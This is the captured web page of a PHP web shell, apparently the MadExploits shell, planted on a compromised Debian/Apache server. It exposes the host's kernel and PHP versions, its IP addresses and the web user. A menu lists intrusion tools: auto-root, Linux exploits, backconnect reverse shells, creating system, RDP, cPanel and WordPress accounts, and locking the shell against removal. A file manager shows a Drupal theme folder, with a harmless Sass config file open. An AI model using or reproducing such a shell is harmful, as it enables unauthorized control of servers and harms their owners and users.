Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.151.211
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
sites /
all /
themes /
zen /
STARTERKIT /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
images-source
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
sass-extensions
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
README.txt
5.38
KB
-rw-r--r--
STARTERKIT.info.txt
5.48
KB
-rw-r--r--
config.rb
1.9
KB
-rw-r--r--
favicon.ico
14.73
KB
-rw-r--r--
logo.png
664
B
-rw-r--r--
screenshot.png
8.67
KB
-rw-r--r--
template.php
4.37
KB
-rw-r--r--
theme-settings.php
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.rb
# # This file is only needed for Compass/Sass integration. If you are not using # Compass, you may safely ignore or delete this file. # # If you'd like to learn more about Sass and Compass, see the sass/README.txt # file for more information. # # Change this to :production when ready to deploy the CSS to the live server. environment = :development #environment = :production # In development, we can turn on the FireSass-compatible debug_info. firesass = false #firesass = true # Location of the theme's resources. css_dir = "css" sass_dir = "sass" extensions_dir = "sass-extensions" images_dir = "images" javascripts_dir = "js" # Require any additional compass plugins installed on your system. #require 'ninesixty' #require 'zen-grids' # Assuming this theme is in sites/*/themes/THEMENAME, you can add the partials # included with a module by uncommenting and modifying one of the lines below: #add_import_path "../../../default/modules/FOO" #add_import_path "../../../all/modules/FOO" #add_import_path "../../../../modules/FOO" ## ## You probably don't need to edit anything below this. ## # You can select your preferred output style here (can be overridden via the command line): # output_style = :expanded or :nested or :compact or :compressed output_style = (environment == :development) ? :expanded : :compressed # To enable relative paths to assets via compass helper functions. Since Drupal # themes can be installed in multiple locations, we don't need to worry about # the absolute path to the theme from the server root. relative_assets = true # To disable debugging comments that display the original location of your selectors. Uncomment: # line_comments = false # Pass options to sass. For development, we turn on the FireSass-compatible # debug_info if the firesass config variable above is true. sass_options = (environment == :development && firesass == true) ? {:debug_info => true} : {}
Close